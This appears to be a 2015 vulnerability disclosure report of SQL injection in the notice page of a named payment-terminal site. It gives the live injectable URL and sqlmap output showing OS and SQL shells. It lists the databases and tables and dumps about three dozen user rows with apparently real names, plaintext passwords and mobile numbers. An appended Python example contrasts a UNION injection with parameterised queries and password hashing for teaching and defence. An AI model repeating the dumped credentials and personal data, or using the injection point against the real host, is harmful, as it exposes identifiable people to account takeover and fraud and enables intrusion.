2015-11-23: Details sent to the vendor, awaiting vendor action
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
Vendor: 联汇通宝. SQL injection in the id parameter of http://mpos.unionpay.so:8383/manager/system/noticeContent.aspx?action=view&id=13&target=mpos

sqlmap output:
back-end DBMS: Microsoft SQL Server 2008
available databases [10]:
[*] channel
[*] distribution
[*] dy_cd_lhtb
[*] lhtmposmerchant
[*] master
[*] model
[*] msdb
[*] railroad
[*] tempdb
[*] trainsms

Both --os-shell and --sql-shell work. On SQL Server, sqlmap's --os-shell runs commands through xp_cmdshell, which requires sysadmin-level rights, so the application's database login is far more privileged than a notice-viewing page needs.
Tables present (note the sqlmapoutput table at the end of the list: it is the temporary table sqlmap creates on SQL Server to capture xp_cmdshell output, and it should be dropped during cleanup):
Database: lhtmposmerchant [79 tables]
db_area
db_billorder_record
db_bulletin
db_channel_applyUsheild
db_channel_dayprofit
db_channel_product_costconfig
db_channel_product_type
db_channel_profitstatistics
db_channel_rechargelog
db_city
db_credit_usedquota
db_lhb_user
db_lhbblackgold_jsrecord
db_lhbblackgold_profit
db_lhbdebit_credit_order
db_lhbgold_profit
db_lhbjhc_jsrecord
db_lhbjhc_profit
db_lhbjhf_jsrecord
db_lhbjhf_profit
db_lhbjhn_jsrecord
db_lhbjhn_profit
db_lhbjht_jsrecord
db_lhbjht_profit
db_lhbjhy_jsrecord
db_lhbjhy_profit
db_lhbptgold_jsrecord
db_lhbptgold_profit
db_lhbrate_config
db_lhbsilver_profit
db_lhbvipos_order
db_lhbwhitegold_profit
db_lhbyz_channelrate
db_lhbyzrate_config
db_lhmall_order_product
db_lhmall_order_product
db_lhplaneTicket_order
db_lhtmpos_billlog
db_lhtmpos_billorder
db_lhtmpos_order
db_lhtmpos_txnorder
db_lhtrainTicket_order
db_lhtrate_config
db_lhtvipos_order
db_lhtvipos_rates
db_liquidationbankcode
db_log
db_member
db_menu
db_merchant_config
db_mpos_channelassign
db_mpos_channelassign
db_mpos_channelrate
db_mpos_lhbrate
db_mpos_merchant
db_mpos_terminal
db_newlhb_user
db_noqrhmobile
db_pay_product_log
db_power
db_product_apply
db_product_buyrecords
db_product_class
db_product_data
db_product_salecost_config
db_product_salecost_config
db_product_saleman
db_province
db_role
db_sellagency
db_sms_send
db_sms_wait
db_subdistributor
db_tempmobile
db_terminal_user
db_user
db_vipuser_rate
db_youze_profitstatistics
sqlmapoutput
Some of the users:
select * from db_user [36]:
[*] 01 2 2014 1:16PM, , 448, 1, VIPOS-陶善忠, 176335, 9, 3, 0, 0, 13032191313
[*] 01 2 2014 2:29PM, , 449, 1, VIPOS-王晓鹤, wxh800918, 9, 3, 0, 0, 15312155678
[*] 01 2 2014 3:12PM, , 450, 1, VIPOS-徐育红, 218321, 9, 3, 0, 0, 13962412277
[*] 01 2 2014 3:18PM, , 451, 1, VIPOS-陈芳, 206323, 9, 3, 0, 0, 18962636627
[*] 01 2 2014 4:20PM, , 452, 1, VIPOS-纪海, 192179, 9, 3, 0, 0, 15618389748
[*] 01 2 2014 4:29PM, , 453, 1, VIPOS-胡国宏, 242510, 9, 3, 0, 0, 15901994055
[*] 01 2 2014 4:50PM, , 454, 1, VIPOS-蒋海, 103619, 9, 3, 0, 0, 18914950187
[*] 01 2 2014 9:44AM, , 447, 1, VIPOS-欧林芝, 250546, 9, 3, 0, 0, 13611933901
[*] 01 3 2014 1:52PM, , 456, 1, VIPOS-王成璋, 043210, 9, 3, 0, 0, 13882177061
[*] 01 3 2014 2:05PM, , 457, 1, VIPOS-吴慧红, 096026, 9, 3, 0, 0, 15800359836
[*] 01 3 2014 11:11AM, , 455, 1, VIPOS-路纯, 017533, 9, 3, 0, 0, 13732671518
[*] 01 6 2014 1:07PM, , 461, 1, VIPOS-甘霖, 220042, 9, 3, 0, 0, 13939945338
[*] 01 6 2014 1:32PM, , 462, 1, VIPOS-庞大江, 249180, 9, 3, 0, 0, 13375151875
[*] 01 6 2014 2:04PM, , 463, 1, VIPOS-裴学丽, 8888, 8, 2, 1, 0, peixueli
[*] 01 6 2014 2:11PM, , 464, 1, VIPOS-向荣, 01724X, 9, 3, 0, 0, 13983211607
[*] 01 6 2014 2:31PM, , 465, 1, VIPOS-杨竹丽, 160885, 9, 3, 0, 0, 13698886899
[*] 01 6 2014 4:32PM, , 468, 1, VIPOS-丁裕菊, 075827, 9, 3, 0, 0, 13906282112
[*] 01 6 2014 11:02AM, , 459, 1, VIPOS-孙培培, 030489, 9, 3, 0, 0, 18616122858
[*] 01 6 2014 12:00AM, , 458, 10, 汪霞白-财务, 123, 5, 1, 0, 0, wangxiabai
[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2014 12:53PM, , 460, 1, VIPOS-江抗军, 20641X, 9, 3, 0, 0, 18962887688
[*] 01 6 2015 8:49AM, , 1392, 1, VIPOS-RHXT刘林, 115411, 9, 3, 0, 0, 13458678768
[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 1:02PM, , 470, 1, VIPOS-陆俊华, 280813, 9, 3, 0, 0, 15001991029
[*] 01 7 2014 4:56PM, , 472, 1, VIPOS-唐秋儿, 8888, 8, 2, 1, 0, tangqiuer
[*] 01 7 2014 12:00AM, , 115, 1, VIPOS-李文娟, 8888, 8, 2, 1, 0, liwenjuan
[*] 01 7 2014 12:01PM, , 469, 1, VIPOS-王晓鹤, 8888, 8, 2, 1, 0, wangxiaohe
[*] 01 7 2015 1:32PM, , 1397, 1, VIPOS-RHXT娄晓倩, 115411, 9, 3, 0, 0, 15881576086
[*] 01 7 2015 1:33PM, , 1398, 1, VIPOS-董樊, 115411, 9, 3, 0, 0, 15928406481
[*] 01 7 2015 10:27AM, , 1395, 1, VIPOS-冯高峰, 264911, 9, 3, 0, 0, 13541222112
[*] 01 7 2015 10:28AM, , 1396, 1, VIPOS-刘昌建, 264911, 9, 3, 0, 0, 13540490546
[*] 01 8 2014 9:31AM, , 474, 1, VIPOS-陆文俊, socl8899, 9, 3, 0, 0, 13918788846
[*] 01 8 2014 9:39AM, , 475, 1, VIPOS-张金凤, 015042, 9, 3, 0, 0, 13918190877
[*] 01 8 2014 12:00AM, , 477, 1, VIPOS-王玲凤, 118913, 8, 2, 1, 0, wlf
Most passwords are trivial, and the administrator account uses a weak password such as 123.
The back end can send verification codes and SMS messages, and the verification code itself is visible.
Other users' passwords can be read: the db_user dump shows them stored in plaintext.
User data is leaked.
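The two root causes above, the untrusted id spliced into the SQL text of the notice page and the plaintext password column, side by side with their fixes. This is an added example, not code from the original report or from the vendor's application: it uses an in-memory SQLite database as a stand-in for the real SQL Server 2008 host, and the table columns, the sample rows and the payload are constructed assumptions (only the table names db_bulletin and db_user come from the list above).

```python
import hashlib
import hmac
import os
import re
import sqlite3

# Constructed sample data standing in for db_bulletin (the notice table the
# view page reads) and db_user (the table dumped above). SQLite is used so the
# example runs offline; the real host is SQL Server 2008. Column names and the
# values are assumptions, not the application's real schema or data.
NOTICES = [(13, "Maintenance window", "MPOS settlement paused on Sunday.")]
USERS = [
    (448, "VIPOS-user-a", "176335", "13000000001"),
    (458, "finance-user", "123", "finance"),
    (463, "VIPOS-user-b", "8888", "userb"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE db_bulletin (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.execute("CREATE TABLE db_user (id INTEGER PRIMARY KEY, username TEXT, password TEXT, mobile TEXT)")
    conn.executemany("INSERT INTO db_bulletin VALUES (?, ?, ?)", NOTICES)
    conn.executemany("INSERT INTO db_user VALUES (?, ?, ?, ?)", USERS)
    return conn


def view_notice_vulnerable(conn, raw_id):
    """The pattern behind noticeContent.aspx?action=view&id=...: the untrusted
    id is spliced into the SQL text, so the caller owns the rest of the statement."""
    sql = "SELECT id, title, content FROM db_bulletin WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


# UNION payload with the same column count as the notice query: the notice page
# now renders db_user rows (username, password) where bulletin rows should be.
UNION_PAYLOAD = "13 UNION SELECT id, username, password FROM db_user"


def is_valid_id(raw_id):
    """A notice id is a short decimal integer and nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None


def view_notice_fixed(conn, raw_id):
    """Validate the type, then bind the value; the DBMS never parses it as SQL."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, content FROM db_bulletin WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256, stored as 'iterations$salt$digest' in place of
    the plaintext password column seen in the dump."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{iterations}${salt.hex()}${digest.hex()}"


def verify_password(stored, candidate):
    """Recompute with the stored salt and compare in constant time."""
    iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    conn = build_db()
    print(view_notice_vulnerable(conn, UNION_PAYLOAD))  # bulletin row plus three db_user rows
    print(is_valid_id(UNION_PAYLOAD), is_valid_id("13"))  # False True
    print(view_notice_fixed(conn, "13"))
    stored = hash_password("123")
    print(verify_password(stored, "123"), verify_password(stored, "124"))  # True False
```

In the ASP.NET original the equivalent fix is `int.TryParse` on the id followed by a `SqlParameter` on the `SqlCommand`; the validation step matters on its own because it also stops the time-based and stacked-query variants sqlmap used to reach xp_cmdshell. Hashing the password column does not help the accounts whose password is 123 or 8888, which still need a reset and a minimum-strength rule.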
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-11-27 13:44
CNVD confirmed and reproduced the reported issue and has notified the site's operating organization through the contact details published on the site.
None yet